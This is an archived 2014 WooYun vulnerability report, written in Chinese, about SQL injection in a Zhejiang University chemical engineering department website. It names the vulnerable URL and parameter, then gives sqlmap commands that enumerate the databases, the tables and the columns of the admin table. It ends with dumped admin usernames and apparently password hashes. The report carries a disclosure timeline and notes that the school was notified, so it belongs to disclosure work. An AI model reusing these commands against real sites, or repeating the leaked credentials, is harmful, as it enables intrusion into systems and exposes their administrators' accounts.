乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-11: 细节已通知厂商并且等待厂商处理中 2014-05-15: 厂商已经确认,细节仅向厂商公开 2014-05-25: 细节向核心白帽子及相关领域专家公开 2014-06-04: 细节向普通白帽子公开 2014-06-14: 细节向实习白帽子公开 2014-06-25: 细节向公众公开
看我如何"四步"拿下&浙江大学化学工程与生物工程学系数据库官网:http://che.zju.edu.cn/
MYSQL注入地址:
http://che.zju.edu.cn/tpe973/topic_detail.php?id=266
SQLMAP- -.#1、获取数据库
./sqlmap.py -u "http://che.zju.edu.cn/tpe973/topic_detail.php?id=266" --dbs
available databases [2]: [*] information_schema[*] tpe973
#2、获取其中一个数据库中的表段:
./sqlmap.py -u "http://che.zju.edu.cn/tpe973/topic_detail.php?id=266" -D tpe973 --tables
[48 tables]+--------------------+| hxcms_about || hxcms_addlist || hxcms_address || hxcms_admin || hxcms_adv || hxcms_allsky || hxcms_announce || hxcms_applications || hxcms_batch || hxcms_bodys || hxcms_bodytest || hxcms_booking || hxcms_buy || hxcms_buycar_model || hxcms_careers || hxcms_channel || hxcms_class || hxcms_classfiy || hxcms_coll || hxcms_comments || hxcms_config || hxcms_contact || hxcms_dkbuy || hxcms_download || hxcms_famous || hxcms_field || hxcms_food || hxcms_friends || hxcms_honors || hxcms_job || hxcms_joinline || hxcms_liubing || hxcms_member || hxcms_memup || hxcms_myfav || hxcms_network || hxcms_news || hxcms_order || hxcms_orderlist || hxcms_orders || hxcms_product || hxcms_questions || hxcms_resume || hxcms_select || hxcms_technical || hxcms_travel || hxcms_visit || hxcms_weblink |+--------------------+
#3、猜解字段:
./sqlmap.py -u "http://che.zju.edu.cn/tpe973/topic_detail.php?id=266" -D tpe973 -T hxcms_admin --columns
[8 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| adminclass | varchar(255) || adminConfig | varchar(255) || adminDate | datetime || adminlock | varbinary(20) || adminlov | int(11) || adminName | varchar(255) || adminPassWord | varchar(255) || ID | int(11) |+---------------+---------------+
#4、猜解内容:
+----+-----------+----------------------------------+| ID | adminName | adminPassWord |+----+-----------+----------------------------------+| 1 | admin | 6b9002a9937cb5581b70383623de69bc || 9 | login | b13080e10d74049632a4beb3fe611652 || 20 | liubing | 84480c7ac532c4a9a6380fc57c08b0fb || 19 | buzhiyang | 714389b85a8e41b1cc13db5c68d85157 |+----+-----------+----------------------------------+
还有很多,就不全展示了- -.
:)
危害等级:中
漏洞Rank:6
确认时间:2014-05-15 15:47
已通知相关学校处理
暂无